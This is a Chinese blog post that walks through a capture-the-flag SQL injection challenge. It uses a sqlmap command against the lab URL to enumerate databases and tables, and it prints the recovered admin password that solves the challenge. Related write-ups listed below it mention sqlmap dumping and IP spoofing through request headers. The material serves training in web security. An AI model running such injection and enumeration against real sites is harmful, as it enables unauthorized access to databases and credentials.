ctf解题--看起来有点难

最新推荐文章于 2022-11-18 20:53:38 发布
原创 最新推荐文章于 2022-11-18 20:53:38 发布 · 994 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ctf #sqlmap

本文介绍了一个具体的SQL注入案例,通过使用sqlmap工具进行数据库、表及字段的探测,并最终获取到用户名和密码,完成挑战任务。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目

切,你那水平也就这么点了,这都是什么题啊!!!
解题链接: http://ctf5.shiyanbar.com/basic/inject

解题

sqlmap.py -u "http://ctf1.shiyanbar.com/basic/inject/index.php?admin=&pass=&action=login" --dbs

  • 查表(有username与password字段)
    test库
    admin表

  • 查值
    username 为 admin
    password为 idnuenna
    直接表单提交即可得到flag。

CTF-Misc:开启全方位解题之旅
邓邓子的博客
06-29 1302
CTF竞赛中,Misc(杂项)题目以信息隐藏与综合取证为核心,融合文件分析、隐写技术、编码转换等多领域知识,是选手技术广度与细节处理能力的试金石。本文构建系统化攻略体系:从文件格式识别、WinHex等基础工具应用入手,解析信息搜集技巧与编码转换逻辑;深入隐写分析,覆盖图片LSB、音频频谱图、文档隐写等场景;结合Wireshark流量分析、磁盘取证等数字取证实操,详解压缩包伪加密破解与密码攻击策略;最后通过实战案例拆解解题思路,帮助读者构建从基础技能到综合应用完整知识链,全面提升Misc题目的分析与破解能力。
CTF-REVERSE练习之API断点
ChuMeng1999的博客
11-27 713
目录预备知识一、相关实验二、输入表与API动态调用三、API断点四、MessageBox实验目的实验环境实验步骤一实验步骤二实验步骤三 预备知识 一、相关实验 本实验要求您已经认真学习和完成了《CTF REVERSE练习之逆向初探》、《CTF REVERSE练习之API定位》。 二、输入表与API动态调用 在逆向分析中经常会遇到输入表这个概念,输入表中保存的是在程序中调用的但定义在其他DLL中的函数信息以及对应的DLL信息。我们在程序中直接调用Windows API的时候,这些API都可以在程序的输入表中可
实验吧WEB CTF 貌似有点 全网最简单易懂的解题方法
hello world
03-13 496
前言 题目网址:http://www.shiyanbar.com/ctf/32 需要用到的工具: burpsuite 理解 函数分析 代码中包含了两个部分,一个是得到IP地址的GetIP函数,一个是通过GetIP函数获得的IP验证是否为1.1.1.1的主函数部分。 那么这题的思路应该非常的清晰,我们需要想方法使得代码中的GetIP函数获得的IP地址为1.1.1.1,我们就能得到flag。 好,那么现在我们再来查看这个函数,在这个函数中我们可以这样去进行理解,首先查看是否存在$_SERVE.
CTF---Web入门第五题 貌似有点
weixin_34280237的博客
11-08 252
貌似有点分值:20 来源: 西普学院 度: 参与人数:7249人 Get Flag:2519人 答题人数:2690人 解题通过率:94% 不多说,去看题目吧。 解题链接: http://ctf5.shiyanbar.com/phpaudit/ 原题链接:http://www.shiyanbar.com/ctf/32 【解题报告】   这是我入门...
ctf实验吧题目:貌似有点
RongChun的博客
01-20 721
ctf实验吧题目:貌似有点 题目界面 题目要求:伪造ip访问网页 解题方法:通过burp抓包修改请求头即可获得答案 原抓包内容: 发送到Repeater中修改后go即可获得答案 ...
实验吧-CTF-web-头有点大&&貌似有点&&看起来有点(学习笔记)
gaily123的博客
10-18 499
实验环境 sqlmap(kali2.0) BurpsuitePro-v1.6 firefox 头有点大 题目链接:http://www.shiyanbar.com/ctf/29 打开发现说缺少 .net framework9.9,但是没有9.9版本,还要求在英格兰地区 此处考虑在http头文件加入此描述,上Burpsuite抓包传给repeater User-Agent是用来记录客户端的系统,...
实验吧-看起来有点【基于sleep的sql注入脚本】
Sp4rkW的博客
08-05 5417
原题内容: 切,你那水平也就这么点了,这都是什么题啊!!! 解题链接:http://ctf5.shiyanbar.com/basic/inject 先吐槽下,,,,这题目开了嘲讽!!! 硬肝了一上午,肝出来就,其实题目挺简单的,写个博客记录下几个个人的失误点,下面为解题思路。 首先login很有意思,admin/admin告诉我用户名密码均错误: 然后试了试1/1,...
CTFHub-Web-信息泄露-Git泄露
qq_54037445的博客
11-18 3626
CTFHub-Web-信息泄露-Git泄露 Log、Stash、Index
2018第二届强网杯线上赛ctf web writeup(度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
在这种情况下,参赛者利用了PHP中数组的特性,提交了`param1[] = 1`和`param2[] = 2`,尽管它们在表面看起来不同,但在转化为字符串进行比较时,数组会被转化为字符串"1"和"2",满足条件并绕过此关。 接下来,第三...
CTF--攻防世界crypto新手训练1-6
qq_40730029的博客
04-16 1488
CTF之攻防世界crypto新手训练 1.base64 题目:元宵节灯谜是一种古老的传统民间观灯猜谜的习俗。 因为谜语能启迪智慧又饶有兴趣,灯谜增添节日气氛,是一项很有趣的活动。 你也很喜欢这个游戏,这不,今年元宵节,心里有个黑客梦的你,约上你青梅竹马的好伙伴小鱼, 来到了cyberpeace的攻防世界猜谜大会,也想着一展身手。 你们一起来到了小孩子叽叽喳喳吵吵闹闹的地方,你俩抬头一看,上面的大红...
初学ctf的题目解析
07-07
初写ctf的一些方法
CTF-入门练习题
10-30
题目来自于蓝盾服务器,度适中,适合于练习,需要wp请留言
实验吧——web之“看起来有点”详解
酒醉浮生的博客
11-13 448
链接: 题目链接:http://www.shiyanbar.com/ctf/2 解题链接:http://ctf5.shiyanbar.com/basic/inject/ 工具:kali(sqlmap解题思路及方法: 首先进入题目链接,看到这个分值,不禁让我很担心,这还是我第一个50分值的题目,而且度也是,给的说明也是那么霸气。。。。。。。 这些信息都在向我们透露这题的度,...
实验吧CTF题库——貌似有点
weixin_34245082的博客
11-14 859
貌似有点 不多说,我们点开链接看看题目吧。 点开链接,我们看到的是这么一个界面,Tips View the source code。(提示我们查看源代码) 我们点开View the source code,查看本题的源代码。 我们看下面这几行代码 if ($GetIPs=="1.1.1.1") {echo "Great! Key is ...
CTF题目度等级划分
m0_51193993的博客
11-18 4841
CTF题目度等级(1-10): 度等级 描述 用途 例子 最大分值 1 赛题的考点是非常常见的,选手们对于此类赛题可以直接进行解题步骤,并且在较短的时间内得到正确答案。该度下通常不需要利用额外的工具,依靠通常电脑上有的程序便能够解题。 1. 通常用于ctf线上比赛的签到题;2. 对安全方向感兴趣但是没有去学习、或者刚刚接触安全方向的人员,此类主要是为了培养做题人的兴趣。 web: get/post请求、修改head头信息、cookie修改reverse:程序中直接明文包含flag,记事
CTF-web-貌似有点
zhz444614971的博客
04-01 427
CTF-web 0x01:貌似有点 题目链接:http://ctf5.shiyanbar.com/phpaudit/ python代码: import requests s=requests.Session() url='http://ctf5.shiyanbar.com/phpaudit/' headers={ # 'X_FORWARDED-FOR':'1.1.1.1', 'Con...
CTF解题笔记(1)
热门推荐
CODING...
01-09 1万+
因缺思汀的绕过 解题路径:http://ctf5.shiyanbar.com/web/pcat/index.php 打开后是一个登录框类似的东西,查看页面源码可以看到有source:source.txt的字样 打开连接:http://ctf5.shiyanbar.com/web/pcat/source.txt 可以看到登录的php逻辑: <?php error_rep
【fairy】实验吧——看起来有点
weixin_40822297的博客
09-28 426
题目链接:ctf5.shiyanbar.com/basic/inject/index.php 看起来像是注入,比较菜,就直接sqlmap了= = 1)爆库:sqlmap -u “ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&amp;pass=admin&amp;action=login” --dbs 2)爆表:sqlm...
关于我对CTF的了解
Swx20999的博客
10-11 696
CTF
湖工商扛把子CTF编码习题解析
假设我们从“湖工商扛把子”CTF压缩包子文件中提取到了名为“1-1”的文件,该文件的内容看起来是经过某种编码的字符串。解题步骤可能包括: 1. **观察字符串特征**:检查字符串是否有明显的编码特征,比如仅包含...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值